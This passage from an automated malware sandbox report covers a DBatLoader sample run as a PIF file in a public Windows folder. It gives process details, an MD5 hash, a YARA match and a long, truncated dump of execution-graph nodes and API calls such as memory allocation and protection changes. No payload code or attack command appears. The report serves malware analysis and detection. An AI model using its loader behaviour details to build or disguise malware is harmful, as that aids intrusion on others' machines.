                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Ocihlomc.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5 hash:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.2212258273.00000000029B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
Has exited:true

Target ID:11
Start time:21:27:12
Start date:18/04/2024
Path:C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\colorcpl.exe
Imagebase:0x530000
File size:86'528 bytes
MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true


Execution Graph

Execution Coverage:18.8%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:81.1%
Total number of Nodes:2000
Total number of Limit Nodes:22
execution_graph:[serialized node/edge data of the interactive Execution Graph viewer (decimal node ids, code addresses between 0x28a1500 and 0x28ca34a, "a->b" edges, collapsed callees shown as "N API calls"); not reproduced here]
API calls named on graph nodes:Sleep, VirtualAlloc, VirtualFree, VirtualProtect, GetCurrentProcess, GetModuleHandleA, GetModuleHandleW, GetProcAddress, NtAllocateVirtualMemory, LoadLibraryW, LoadLibraryExA, FreeLibrary, RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile, NtClose, GetFileAttributesA, GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetThreadLocale, GetLocaleInfoA, EnumSystemLocalesA, lstrcpynA, lstrlenA, SysAllocStringLen, SysReAllocStringLen, SysFreeString, QueryPerformanceCounter, GetTickCount, timeSetEvent, GetMessageA, TranslateMessage, DispatchMessageA, GetStdHandle, WriteFile, MessageBoxA, InetIsOffline, ExitProcess
Notable sequences in the graph:GetCurrentProcess followed by a node at 28b7968 that resolves NtAllocateVirtualMemory through GetModuleHandleW and GetProcAddress; GetModuleHandleA, GetProcAddress and VirtualProtect at 28b7b5b; RtlDosPathNameToNtPathName_U, NtCreateFile, then NtWriteFile and NtClose in the routine starting at 28bc3f8; InetIsOffline in the routine starting at 28bd5d0
36222 28bded7 36221->36222 36223 28bdeef 36222->36223 36224 28a47b0 11 API calls 36223->36224 36225 28bdf0e 36224->36225 36226 28bdf26 36225->36226 36227 28b7be8 17 API calls 36226->36227 36228 28bdf32 36227->36228 36229 28a4824 11 API calls 36228->36229 36230 28bdf53 36229->36230 36231 28bdf6b 36230->36231 36232 28a47b0 11 API calls 36231->36232 36233 28bdf8a 36232->36233 36234 28bdfa2 36233->36234 36235 28b7be8 17 API calls 36234->36235 36236 28bdfae 36235->36236 36237 28bdfd5 36236->36237 36238 28a4824 11 API calls 36237->36238 36239 28bdff6 36238->36239 36240 28be00e 36239->36240 36241 28a47b0 11 API calls 36240->36241 36242 28be02d 36241->36242 36243 28b7be8 17 API calls 36242->36243 36244 28be051 36243->36244 36245 28a4824 11 API calls 36244->36245 36246 28be072 36245->36246 36247 28be08a 36246->36247 36248 28a47b0 11 API calls 36247->36248 36249 28be0a9 36248->36249 36250 28b7be8 17 API calls 36249->36250 36251 28be0cd 36250->36251 36252 28a47b0 11 API calls 36251->36252 36253 28be0e3 36252->36253 36254 28a7e18 GetFileAttributesA 36253->36254 36255 28be0ee 36254->36255 36256 28be203 36255->36256 36257 28be0f6 36255->36257 36258 28a4824 11 API calls 36256->36258 36259 28a4824 11 API calls 36257->36259 36260 28be224 36258->36260 36261 28be117 36259->36261 36262 28be22f 36260->36262 36263 28be122 36261->36263 36264 28be23c 36262->36264 36265 28be12f 36263->36265 36266 28a47b0 11 API calls 36264->36266 36267 28a47b0 11 API calls 36265->36267 36268 28be25b 36266->36268 36269 28be14e 36267->36269 36270 28be266 36268->36270 36271 28be159 36269->36271 36272 28be273 36270->36272 36273 28be166 36271->36273 36274 28b7be8 17 API calls 36272->36274 36275 28b7be8 17 API calls 36273->36275 36276 28be27f 36274->36276 36277 28be172 36275->36277 36278 28a4824 11 API calls 36276->36278 36279 28a4824 11 API calls 36277->36279 36280 28be2a0 36278->36280 36281 28be193 36279->36281 36282 28be2ab 36280->36282 36283 28be19e 36281->36283 36284 28be2b8 36282->36284 36285 28be1ab 
36283->36285 36286 28a47b0 11 API calls 36284->36286 36287 28a47b0 11 API calls 36285->36287 36288 28be2d7 36286->36288 36289 28be1ca 36287->36289 36290 28be2e2 36288->36290 36291 28be1d5 36289->36291 36292 28be2ef 36290->36292 36293 28be1e2 36291->36293 36294 28b7be8 17 API calls 36292->36294 36295 28b7be8 17 API calls 36293->36295 36296 28be2fb 36294->36296 36297 28be1ee 36295->36297 36298 28a44f4 11 API calls 36296->36298 36299 28a44f4 11 API calls 36297->36299 36300 28be1fe 36298->36300 36299->36300 36301 28a4824 11 API calls 36300->36301 36302 28be32b 36301->36302 36303 28be336 36302->36303 36304 28a47b0 11 API calls 36303->36304 36305 28be362 36304->36305 36306 28be36d 36305->36306 36307 28b7be8 17 API calls 36306->36307 36308 28be386 36307->36308 36309 28a4824 11 API calls 36308->36309 36310 28be3a7 36309->36310 36311 28be3b2 36310->36311 36312 28be3bf 36311->36312 36313 28a47b0 11 API calls 36312->36313 36314 28be3de 36313->36314 36315 28be3e9 36314->36315 36316 28b7be8 17 API calls 36315->36316 36317 28be402 36316->36317 38545 28ac320 GetModuleFileNameA 36317->38545 36320 28a44f4 11 API calls 36321 28be41f 36320->36321 38548 28a49c4 36321->38548 36325 28a4824 11 API calls 36326 28be473 36325->36326 36327 28be48b 36326->36327 36328 28a47b0 11 API calls 36327->36328 36329 28be4aa 36328->36329 36330 28a4698 36329->36330 36331 28be4c2 36330->36331 36332 28b7be8 17 API calls 36331->36332 36333 28be4ce 36332->36333 36334 28a4824 11 API calls 36333->36334 36335 28be4ef 36334->36335 36336 28be507 36335->36336 36337 28a47b0 11 API calls 36336->36337 36338 28be526 36337->36338 36339 28a4698 36338->36339 36340 28be53e 36339->36340 36341 28b7be8 17 API calls 36340->36341 36342 28be54a 36341->36342 36343 28a4824 11 API calls 36342->36343 36344 28be56b 36343->36344 36345 28be576 36344->36345 36346 28be583 36345->36346 36347 28a47b0 11 API calls 36346->36347 36348 28be5a2 36347->36348 36349 28a4698 36348->36349 36350 28be5ba 36349->36350 36351 28b7be8 17 API calls 
36350->36351 36352 28be5c6 36351->36352 36353 28a4824 11 API calls 36352->36353 36354 28be5e7 36353->36354 36355 28be5f2 36354->36355 36356 28be5ff 36355->36356 36357 28a47b0 11 API calls 36356->36357 36358 28be61e 36357->36358 36359 28a4698 36358->36359 36360 28be636 36359->36360 36361 28b7be8 17 API calls 36360->36361 36362 28be642 36361->36362 36363 28a44f4 11 API calls 36362->36363 36364 28be651 36363->36364 36365 28a4824 11 API calls 36364->36365 36366 28be672 36365->36366 36367 28be67d 36366->36367 36368 28be68a 36367->36368 36369 28a47b0 11 API calls 36368->36369 36370 28be6a9 36369->36370 36371 28a4964 36370->36371 36372 28be6b4 36371->36372 36373 28be6c1 36372->36373 36374 28b7be8 17 API calls 36373->36374 36375 28be6cd 36374->36375 36376 28a4824 11 API calls 36375->36376 36377 28be6ee 36376->36377 36378 28be706 36377->36378 36379 28a47b0 11 API calls 36378->36379 36380 28be725 36379->36380 36381 28be73d 36380->36381 36382 28b7be8 17 API calls 36381->36382 36383 28be749 36382->36383 36384 28a4824 11 API calls 36383->36384 36385 28be76a 36384->36385 36386 28be775 36385->36386 36387 28be782 36386->36387 36388 28a47b0 11 API calls 36387->36388 36389 28be7a1 36388->36389 36390 28be7ac 36389->36390 36391 28be7b9 36390->36391 36392 28b7be8 17 API calls 36391->36392 36393 28be7c5 36392->36393 36394 28be7cf 36393->36394 36395 28be7dc 36394->36395 36396 28a7e18 GetFileAttributesA 36395->36396 36397 28be7e7 36396->36397 36398 28befab 36397->36398 36399 28be7ef 36397->36399 36401 28a4824 11 API calls 36398->36401 36400 28a4824 11 API calls 36399->36400 36403 28be810 36400->36403 36402 28befcc 36401->36402 36404 28befd7 36402->36404 36406 28a4698 36403->36406 36405 28befe4 36404->36405 36408 28a47b0 11 API calls 36405->36408 36407 28be828 36406->36407 36409 28a47b0 11 API calls 36407->36409 36410 28bf003 36408->36410 36411 28be847 36409->36411 36412 28a4964 36410->36412 36414 28be85f 36411->36414 36413 28bf00e 36412->36413 36415 28b7be8 17 API calls 36413->36415 36416 
28b7be8 17 API calls 36414->36416 36418 28bf027 36415->36418 36417 28be86b 36416->36417 36419 28a4824 11 API calls 36417->36419 36420 28a4824 11 API calls 36418->36420 36421 28be88c 36419->36421 36422 28bf048 36420->36422 36424 28a4698 36421->36424 36423 28bf053 36422->36423 36425 28bf060 36423->36425 36426 28be8a4 36424->36426 36427 28a47b0 11 API calls 36425->36427 36428 28a47b0 11 API calls 36426->36428 36429 28bf07f 36427->36429 36430 28be8c3 36428->36430 36431 28a4964 36429->36431 36432 28a4964 36430->36432 36433 28bf08a 36431->36433 36434 28be8ce 36432->36434 36435 28bf097 36433->36435 36436 28a4698 36434->36436 36438 28b7be8 17 API calls 36435->36438 36437 28be8db 36436->36437 36439 28b7be8 17 API calls 36437->36439 36440 28bf0a3 36438->36440 36441 28be8e7 36439->36441 36442 28a4824 11 API calls 36440->36442 36443 28a4824 11 API calls 36441->36443 36445 28bf0c4 36442->36445 36444 28be908 36443->36444 36446 28a4964 36444->36446 36449 28bf0dc 36445->36449 36447 28be913 36446->36447 36448 28a4698 36447->36448 36450 28be920 36448->36450 36451 28a47b0 11 API calls 36449->36451 36452 28a47b0 11 API calls 36450->36452 36453 28bf0fb 36451->36453 36454 28be93f 36452->36454 36456 28bf106 36453->36456 36455 28be94a 36454->36455 36457 28be957 36455->36457 36458 28b7be8 17 API calls 36456->36458 36459 28b7be8 17 API calls 36457->36459 36460 28bf11f 36458->36460 36461 28be963 36459->36461 38555 28a4da4 36460->38555 36463 28be974 36461->36463 39031 28bc4dc 36463->39031 36469 28a44f4 11 API calls 36471 28be995 36469->36471 36473 28a4824 11 API calls 36471->36473 36476 28be9b6 36473->36476 36477 28be9c1 36476->36477 36479 28be9ce 36477->36479 36481 28a47b0 11 API calls 36479->36481 36483 28be9ed 36481->36483 36485 28be9f8 36483->36485 36487 28bea05 36485->36487 36489 28b7be8 17 API calls 36487->36489 36490 28bea11 36489->36490 36492 28a4824 11 API calls 36490->36492 36494 28bea32 36492->36494 36496 28a4964 36494->36496 36497 28bea3d 36496->36497 36499 28a4698 36497->36499 
36501 28bea4a 36499->36501 36503 28a47b0 11 API calls 36501->36503 36505 28bea69 36503->36505 36507 28a4698 36505->36507 36509 28bea81 36507->36509 36511 28b7be8 17 API calls 36509->36511 36513 28bea8d 36511->36513 36515 28a4824 11 API calls 36513->36515 36516 28beaae 36515->36516 36518 28a4964 36516->36518 36520 28beab9 36518->36520 36522 28a4698 36520->36522 36523 28beac6 36522->36523 36525 28a47b0 11 API calls 36523->36525 36527 28beae5 36525->36527 36530 28a4698 36527->36530 36531 28beafd 36530->36531 36533 28b7be8 17 API calls 36531->36533 36535 28beb09 36533->36535 36537 28bc640 16 API calls 36535->36537 36539 28beb1e 36537->36539 36541 28a57dc 13 API calls 36539->36541 36542 28beb31 36541->36542 36544 28a4824 11 API calls 36542->36544 36546 28beb52 36544->36546 36549 28beb6a 36546->36549 36551 28a47b0 11 API calls 36549->36551 36553 28beb89 36551->36553 36556 28beba1 36553->36556 36559 28b7be8 17 API calls 36556->36559 36561 28bebad 36559->36561 36563 28a4824 11 API calls 36561->36563 36567 28bebce 36563->36567 36570 28a47b0 11 API calls 36567->36570 36575 28bec05 36570->36575 36578 28b7be8 17 API calls 36575->36578 36580 28bec29 36578->36580 36582 28a44f4 11 API calls 36580->36582 36584 28bec38 36582->36584 39046 28bc5c8 36584->39046 36589 28bec4a 36592 28a4824 11 API calls 36589->36592 36590 28befa6 36593 28a4824 11 API calls 36590->36593 36595 28bec6b 36592->36595 36596 28c07a6 36593->36596 36599 28bec76 36595->36599 36601 28c07be 36596->36601 36604 28bec83 36599->36604 36605 28a47b0 11 API calls 36601->36605 36607 28a47b0 11 API calls 36604->36607 36608 28c07dd 36605->36608 36610 28beca2 36607->36610 36613 28c07e8 36608->36613 36612 28becad 36610->36612 36618 28becba 36612->36618 36615 28c07f5 36613->36615 36619 28b7be8 17 API calls 36615->36619 36621 28b7be8 17 API calls 36618->36621 36622 28c0801 36619->36622 36624 28becc6 36621->36624 36626 28a4824 11 API calls 36622->36626 36625 28a4824 11 API calls 36624->36625 36628 28bece7 36625->36628 36629 
28c0822 36626->36629 36631 28becf2 36628->36631 36633 28c083a 36629->36633 36635 28becff 36631->36635 36636 28a47b0 11 API calls 36633->36636 36638 28a47b0 11 API calls 36635->36638 36639 28c0859 36636->36639 36641 28bed1e 36638->36641 36642 28c0864 36639->36642 36644 28bed29 36641->36644 36648 28b7be8 17 API calls 36642->36648 36647 28bed36 36644->36647 36650 28b7be8 17 API calls 36647->36650 36651 28c087d 36648->36651 36653 28bed42 36650->36653 36654 28a4824 11 API calls 36651->36654 36656 28a4824 11 API calls 36653->36656 36662 28c089e 36654->36662 36657 28bed63 36656->36657 36658 28a4964 36657->36658 36659 28bed6e 36658->36659 36661 28a4698 36659->36661 36663 28bed7b 36661->36663 36664 28c08b6 36662->36664 36667 28a47b0 11 API calls 36663->36667 36668 28a47b0 11 API calls 36664->36668 36670 28bed9a 36667->36670 36669 28c08d5 36668->36669 36671 28c08e0 36669->36671 36674 28a4698 36670->36674 36675 28c08ed 36671->36675 36677 28bedb2 36674->36677 36678 28b7be8 17 API calls 36675->36678 36680 28b7be8 17 API calls 36677->36680 36681 28c08f9 36678->36681 36683 28bedbe 36680->36683 36684 28a4824 11 API calls 36681->36684 36686 28a4824 11 API calls 36683->36686 36687 28c091a 36684->36687 36689 28beddf 36686->36689 36692 28c0925 36687->36692 36691 28a4964 36689->36691 36694 28bedea 36691->36694 36697 28c0932 36692->36697 36695 28a4698 36694->36695 36696 28bedf7 36695->36696 36699 28a47b0 11 API calls 36696->36699 36700 28a47b0 11 API calls 36697->36700 36702 28bee16 36699->36702 36706 28c0951 36700->36706 36707 28a4698 36702->36707 36708 28c0969 36706->36708 36709 28bee2e 36707->36709 36710 28b7be8 17 API calls 36708->36710 36712 28b7be8 17 API calls 36709->36712 36713 28c0975 36710->36713 36715 28bee3a 36712->36715 36718 28c099a 36713->36718 36719 28c8b9b 36713->36719 36717 28a4824 11 API calls 36715->36717 36721 28bee5b 36717->36721 36723 28a4824 11 API calls 36718->36723 36722 28a44c4 11 API calls 36719->36722 36725 28a4964 36721->36725 36726 28c8bb8 36722->36726 
36727 28c09bb 36723->36727 36729 28bee66 36725->36729 36730 28a44c4 11 API calls 36726->36730 36733 28c09c6 36727->36733 36731 28a4698 36729->36731 36732 28c8bc8 36730->36732 36735 28bee73 36731->36735 36737 28a44c4 11 API calls 36732->36737 36744 28a47b0 11 API calls 36733->36744 36736 28a47b0 11 API calls 36735->36736 36739 28bee92 36736->36739 36740 28c8bd8 36737->36740 36742 28bee9d 36739->36742 36743 28a44c4 11 API calls 36740->36743 36750 28beeaa 36742->36750 36746 28c8be8 36743->36746 36747 28c09f2 36744->36747 36751 28a44c4 11 API calls 36746->36751 36752 28c09fd 36747->36752 36756 28b7be8 17 API calls 36750->36756 36753 28c8bf8 36751->36753 36761 28b7be8 17 API calls 36752->36761 36754 28a4c24 SysFreeString 36753->36754 36757 28c8c03 36754->36757 36759 28beeb6 36756->36759 36760 28a44a0 11 API calls 36757->36760 36763 28beec0 36759->36763 36764 28c8c0e 36760->36764 36765 28c0a16 36761->36765 39052 28a4d38 36763->39052 36767 28a4c24 SysFreeString 36764->36767 36768 28a4824 11 API calls 36765->36768 36771 28c8c19 36767->36771 36781 28c0a37 36768->36781 36774 28a44c4 11 API calls 36771->36774 36777 28c8c29 36774->36777 36780 28a44c4 11 API calls 36777->36780 36784 28c8c39 36780->36784 36789 28a47b0 11 API calls 36781->36789 36788 28a44c4 11 API calls 36784->36788 36792 28c8c49 36788->36792 36797 28c0a6e 36789->36797 36794 28a44a0 11 API calls 36792->36794 36796 28c8c54 36794->36796 36799 28a44c4 11 API calls 36796->36799 36804 28b7be8 17 API calls 36797->36804 36802 28c8c64 36799->36802 36803 28a44c4 11 API calls 36802->36803 36807 28c8c74 36803->36807 36808 28c0a92 36804->36808 36811 28a4c24 SysFreeString 36807->36811 36812 28a4824 11 API calls 36808->36812 36815 28c8c7f 36811->36815 36821 28c0ab3 36812->36821 36817 28a44c4 11 API calls 36815->36817 36818 28c8c8f 36817->36818 36820 28a4c24 SysFreeString 36818->36820 36824 28c8c9a 36820->36824 36825 28c0acb 36821->36825 36827 28a44c4 11 API calls 36824->36827 36828 28a47b0 11 API calls 36825->36828 36830 
28c8caa 36827->36830 36837 28c0aea 36828->36837 36832 28a44c4 11 API calls 36830->36832 36834 28c8cba 36832->36834 36836 28a44a0 11 API calls 36834->36836 36839 28c8cc5 36836->36839 36840 28c0b02 36837->36840 36843 28a44c4 11 API calls 36839->36843 36841 28b7be8 17 API calls 36840->36841 36844 28c0b0e 36841->36844 36846 28c8cd5 36843->36846 36848 28a4824 11 API calls 36844->36848 36847 28a44c4 11 API calls 36846->36847 36850 28c8ce5 36847->36850 36851 28c0b2f 36848->36851 36852 28a44a0 11 API calls 36850->36852 36855 28c0b3a 36851->36855 36854 28c8cf0 36852->36854 36856 28a44c4 11 API calls 36854->36856 36859 28c0b47 36855->36859 36858 28c8d00 36856->36858 39064 28a4c3c 36858->39064 36862 28a47b0 11 API calls 36859->36862 36871 28c0b66 36862->36871 36866 28a44c4 11 API calls 36868 28c8d20 36866->36868 36870 28a44c4 11 API calls 36868->36870 36873 28c8d30 36870->36873 36874 28c0b7e 36871->36874 36876 28a4c24 SysFreeString 36873->36876 36877 28b7be8 17 API calls 36874->36877 36879 28c8d3b 36876->36879 36880 28c0b8a 36877->36880 36884 28a44a0 11 API calls 36879->36884 38557 28a7a88 36880->38557 36887 28c8d46 36884->36887 36888 28a4c24 SysFreeString 36887->36888 36890 28c8d51 36888->36890 36892 28a44c4 11 API calls 36890->36892 36895 28c8d61 36892->36895 36893 28a44f4 11 API calls 36896 28c0bb6 36893->36896 36898 28a44c4 11 API calls 36895->36898 36899 28a4824 11 API calls 36896->36899 36901 28c8d71 36898->36901 36908 28c0bd7 36899->36908 36903 28a4c24 SysFreeString 36901->36903 36905 28c8d7c 36903->36905 36907 28a44a0 11 API calls 36905->36907 36909 28c8d87 36907->36909 36910 28c0bef 36908->36910 36911 28a4c24 SysFreeString 36909->36911 36912 28a47b0 11 API calls 36910->36912 36914 28c8d92 36911->36914 36920 28c0c0e 36912->36920 36916 28a44c4 11 API calls 36914->36916 36918 28c8da2 36916->36918 36922 28a4c24 SysFreeString 36918->36922 36923 28c0c26 36920->36923 36925 28c8dad 36922->36925 36927 28b7be8 17 API calls 36923->36927 36926 28a44a0 11 API calls 36925->36926 
36929 28c8db8 36926->36929 36930 28c0c32 36927->36930 36932 28a4c24 SysFreeString 36929->36932 36933 28a4824 11 API calls 36930->36933 36935 28c8dc3 36932->36935 36942 28c0c53 36933->36942 36937 28a44c4 11 API calls 36935->36937 36939 28c8dd3 36937->36939 36941 28a4c24 SysFreeString 36939->36941 36943 28c8dde 36941->36943 36944 28c0c6b 36942->36944 36945 28a44a0 11 API calls 36943->36945 36946 28a47b0 11 API calls 36944->36946 36948 28c8de9 36945->36948 36954 28c0c8a 36946->36954 36950 28a4c24 SysFreeString 36948->36950 36951 28c8df4 36950->36951 36953 28a44c4 11 API calls 36951->36953 36956 28c8e04 36953->36956 36957 28c0ca2 36954->36957 36961 28a44a0 11 API calls 36956->36961 36959 28b7be8 17 API calls 36957->36959 36962 28c0cae 36959->36962 36964 28c8e0f 36961->36964 38570 28bd20c 36962->38570 36965 28a44c4 11 API calls 36964->36965 36968 28c8e1f 36965->36968 36971 28a44c4 11 API calls 36968->36971 36974 28c8e2f 36971->36974 36972 28a44f4 11 API calls 36975 28c0cce 36972->36975 39068 28a57a0 13 API calls 36974->39068 36978 28a4824 11 API calls 36975->36978 36987 28c0cef 36978->36987 36980 28c8e40 36982 28a44c4 11 API calls 36980->36982 36984 28c8e50 36982->36984 36986 28a44c4 11 API calls 36984->36986 36988 28c8e60 36986->36988 36990 28a47b0 11 API calls 36987->36990 39069 28ae3b0 52 API calls 36988->39069 36993 28c0d26 36990->36993 36992 28c8e6b 36995 28a44c4 11 API calls 36992->36995 36998 28c0d31 36993->36998 36997 28c8e7b 36995->36997 37001 28a44c4 11 API calls 36997->37001 37004 28b7be8 17 API calls 36998->37004 37003 28c8e8b 37001->37003 37008 28a44c4 11 API calls 37003->37008 37006 28c0d4a 37004->37006 37009 28a4824 11 API calls 37006->37009 37011 28c8ea6 37008->37011 37017 28c0d6b 37009->37017 39070 28a57a0 13 API calls 37011->39070 37014 28c8eb7 37016 28a44c4 11 API calls 37014->37016 37019 28c8ec7 37016->37019 37022 28a47b0 11 API calls 37017->37022 37021 28a44a0 11 API calls 37019->37021 37024 28c8ed2 37021->37024 37025 28c0da2 37022->37025 37027 
28a44c4 11 API calls 37024->37027 37029 28c0dad 37025->37029 37028 28c8ee2 37027->37028 37031 28a44c4 11 API calls 37028->37031 37034 28c0dba 37029->37034 37033 28c8ef2 37031->37033 39071 28a57a0 13 API calls 37033->39071 37036 28b7be8 17 API calls 37034->37036 37039 28c0dc6 37036->37039 37043 28a4824 11 API calls 37039->37043 37041 28c8f03 37042 28a44c4 11 API calls 37041->37042 37045 28c8f13 37042->37045 37046 28c0de7 37043->37046 37048 28a4c24 SysFreeString 37045->37048 37050 28c0df2 37046->37050 37049 28c8f1e 37048->37049 37052 28a44c4 11 API calls 37049->37052 37055 28c0dff 37050->37055 37054 28c8f2e 37052->37054 37056 28a4c24 SysFreeString 37054->37056 37057 28a47b0 11 API calls 37055->37057 37059 28c8f39 37056->37059 37060 28c0e1e 37057->37060 37062 28a44c4 11 API calls 37059->37062 37064 28c0e29 37060->37064 37063 28c8f49 37062->37063 39072 28a57a0 13 API calls 37063->39072 37069 28c0e36 37064->37069 37068 28c8f5a 37071 28a44c4 11 API calls 37068->37071 37072 28b7be8 17 API calls 37069->37072 37074 28c8f6a 37071->37074 37075 28c0e42 37072->37075 37078 28a4c24 SysFreeString 37074->37078 37079 28c0e53 37075->37079 37081 28c8f75 37078->37081 38575 28bc640 37079->38575 37082 28a44c4 11 API calls 37081->37082 37085 28c8f85 37082->37085 37088 28a44c4 11 API calls 37085->37088 37091 28c8f95 37088->37091 37094 28a44c4 11 API calls 37091->37094 37096 28c8fa5 37094->37096 37095 28a4824 11 API calls 37097 28c0e9d 37095->37097 37099 28a44c4 11 API calls 37096->37099 37102 28c0ea8 37097->37102 37101 28c8fb5 37099->37101 37101->36042 37105 28c0eb5 37102->37105 37107 28a47b0 11 API calls 37105->37107 37112 28c0ed4 37107->37112 37114 28c0eec 37112->37114 37116 28b7be8 17 API calls 37114->37116 37118 28c0ef8 37116->37118 37120 28a4824 11 API calls 37118->37120 37121 28c0f19 37120->37121 37124 28c0f24 37121->37124 37127 28c0f31 37124->37127 37129 28a47b0 11 API calls 37127->37129 37134 28c0f50 37129->37134 37136 28c0f68 37134->37136 37138 28b7be8 17 API calls 37136->37138 
37140 28c0f74 37138->37140 37141 28a44f4 11 API calls 37140->37141 37143 28c0f83 37141->37143 37144 28a44f4 11 API calls 37143->37144 37145 28c0f92 37144->37145 37147 28a44f4 11 API calls 37145->37147 37148 28c0fa1 37147->37148 37150 28a44f4 11 API calls 37148->37150 37152 28c0fb0 37150->37152 37153 28a44f4 11 API calls 37152->37153 37155 28c0fbf 37153->37155 37157 28a44f4 11 API calls 37155->37157 37159 28c0fce 37157->37159 37161 28a44f4 11 API calls 37159->37161 37162 28c0fdd 37161->37162 37163 28a44f4 11 API calls 37162->37163 37164 28c0fec 37163->37164 37166 28a44f4 11 API calls 37164->37166 37167 28c0ffb 37166->37167 37169 28a44f4 11 API calls 37167->37169 37170 28c100a 37169->37170 37172 28a44f4 11 API calls 37170->37172 37173 28c1019 37172->37173 37174 28a4824 11 API calls 37173->37174 37179 28c103a 37174->37179 37181 28a47b0 11 API calls 37179->37181 37185 28c1071 37181->37185 37186 28b7be8 17 API calls 37185->37186 37188 28c1095 37186->37188 37189 28a4824 11 API calls 37188->37189 37193 28c10b6 37189->37193 37195 28c10ce 37193->37195 37196 28a47b0 11 API calls 37195->37196 37198 28c10ed 37196->37198 37199 28c1105 37198->37199 37200 28b7be8 17 API calls 37199->37200 37203 28c1111 37200->37203 37204 28c1128 37203->37204 38592 28a7e3c 37204->38592 37208 28c113b 37211 28a4824 11 API calls 37208->37211 37209 28c1324 37210 28a4824 11 API calls 37209->37210 37212 28c1345 37210->37212 37213 28c115c 37211->37213 37215 28c1350 37212->37215 37219 28c1174 37213->37219 37218 28c135d 37215->37218 37221 28a47b0 11 API calls 37218->37221 37220 28a47b0 11 API calls 37219->37220 37225 28c1193 37220->37225 37223 28c137c 37221->37223 37226 28c1394 37223->37226 37228 28b7be8 17 API calls 37225->37228 37227 28b7be8 17 API calls 37226->37227 37229 28c13a0 37227->37229 37230 28c11b7 37228->37230 37232 28a4824 11 API calls 37229->37232 37233 28a4824 11 API calls 37230->37233 37235 28c13c1 37232->37235 37236 28c11d8 37233->37236 37237 28c13cc 37235->37237 37241 28c11f0 37236->37241 
37240 28c13d9 37237->37240 37242 28a47b0 11 API calls 37240->37242 37243 28a47b0 11 API calls 37241->37243 37246 28c13f8 37242->37246 37244 28c120f 37243->37244 37249 28c1227 37244->37249 37250 28c1410 37246->37250 37251 28b7be8 17 API calls 37249->37251 37252 28b7be8 17 API calls 37250->37252 37254 28c1233 37251->37254 37253 28c141c 37252->37253 37257 28a49c4 11 API calls 37253->37257 37260 28a47b0 11 API calls 37254->37260 37259 28c144f 37257->37259 37262 28a4824 11 API calls 37259->37262 37264 28c1262 37260->37264 37265 28c1470 37262->37265 37267 28b7be8 17 API calls 37264->37267 37271 28a47b0 11 API calls 37265->37271 37269 28c1286 37267->37269 37272 28a4824 11 API calls 37269->37272 37275 28c14a7 37271->37275 37273 28c12a7 37272->37273 37276 28c12bf 37273->37276 37278 28b7be8 17 API calls 37275->37278 37281 28a47b0 11 API calls 37276->37281 37280 28c14cb 37278->37280 37283 28a4824 11 API calls 37280->37283 37284 28c12de 37281->37284 37287 28c14ec 37283->37287 37286 28c12f6 37284->37286 37290 28b7be8 17 API calls 37286->37290 37289 28c1504 37287->37289 37292 28a47b0 11 API calls 37289->37292 37293 28c1302 37290->37293 37296 28c1523 37292->37296 37294 28c1319 37293->37294 39054 28a8004 CreateDirectoryA 37294->39054 37299 28c153b 37296->37299 37301 28b7be8 17 API calls 37299->37301 37302 28c1547 37301->37302 37304 28a4824 11 API calls 37302->37304 37306 28c1568 37304->37306 37309 28c1573 37306->37309 37312 28a47b0 11 API calls 37309->37312 37314 28c159f 37312->37314 37315 28c15aa 37314->37315 37318 28b7be8 17 API calls 37315->37318 37319 28c15c3 37318->37319 37321 28a4824 11 API calls 37319->37321 37325 28c15e4 37321->37325 37327 28a47b0 11 API calls 37325->37327 37330 28c161b 37327->37330 37334 28b7be8 17 API calls 37330->37334 37335 28c163f 37334->37335 37338 28c1654 37335->37338 37339 28c3345 37335->37339 37340 28a4824 11 API calls 37338->37340 37342 28a4824 11 API calls 37339->37342 37347 28c1692 37340->37347 37344 28c3366 37342->37344 37349 28c3371 
37344->37349 37348 28c16aa 37347->37348 37350 28a7e18 GetFileAttributesA 37348->37350 37352 28a47b0 11 API calls 37349->37352 37353 28c16b5 37350->37353 37354 28c339d 37352->37354 37353->37339 37355 28c16bd 37353->37355 37359 28c33a8 37354->37359 37357 28a4824 11 API calls 37355->37357 37363 28c16de 37357->37363 37360 28b7be8 17 API calls 37359->37360 37362 28c33c1 37360->37362 37365 28a4824 11 API calls 37362->37365 37367 28a47b0 11 API calls 37363->37367 37370 28c33e2 37365->37370 37371 28c1715 37367->37371 37373 28a47b0 11 API calls 37370->37373 37374 28b7be8 17 API calls 37371->37374 37380 28c3419 37373->37380 37375 28c1739 37374->37375 37377 28a4824 11 API calls 37375->37377 37386 28c175a 37377->37386 37382 28b7be8 17 API calls 37380->37382 37385 28c343d 37382->37385 37388 28a4824 11 API calls 37385->37388 37389 28c1772 37386->37389 37391 28c345e 37388->37391 37392 28a47b0 11 API calls 37389->37392 37395 28c3476 37391->37395 37396 28c1791 37392->37396 37399 28a47b0 11 API calls 37395->37399 37397 28c17a9 37396->37397 37400 28b7be8 17 API calls 37397->37400 37402 28c3495 37399->37402 37403 28c17b5 37400->37403 37408 28c34ad 37402->37408 37405 28a4824 11 API calls 37403->37405 37406 28c17d6 37405->37406 37409 28c17e1 37406->37409 37411 28b7be8 17 API calls 37408->37411 37418 28a47b0 11 API calls 37409->37418 37413 28c34b9 37411->37413 37414 28a4824 11 API calls 37413->37414 37417 28c34da 37414->37417 37424 28c34e5 37417->37424 37420 28c180d 37418->37420 37422 28c1818 37420->37422 37426 28b7be8 17 API calls 37422->37426 37425 28a47b0 11 API calls 37424->37425 37428 28c3511 37425->37428 37429 28c1831 37426->37429 37434 28c351c 37428->37434 37430 28c1841 37429->37430 37432 28a7e3c GetFileAttributesA 37430->37432 37435 28c184c 37432->37435 37436 28b7be8 17 API calls 37434->37436 37435->37339 37437 28c1854 37435->37437 37439 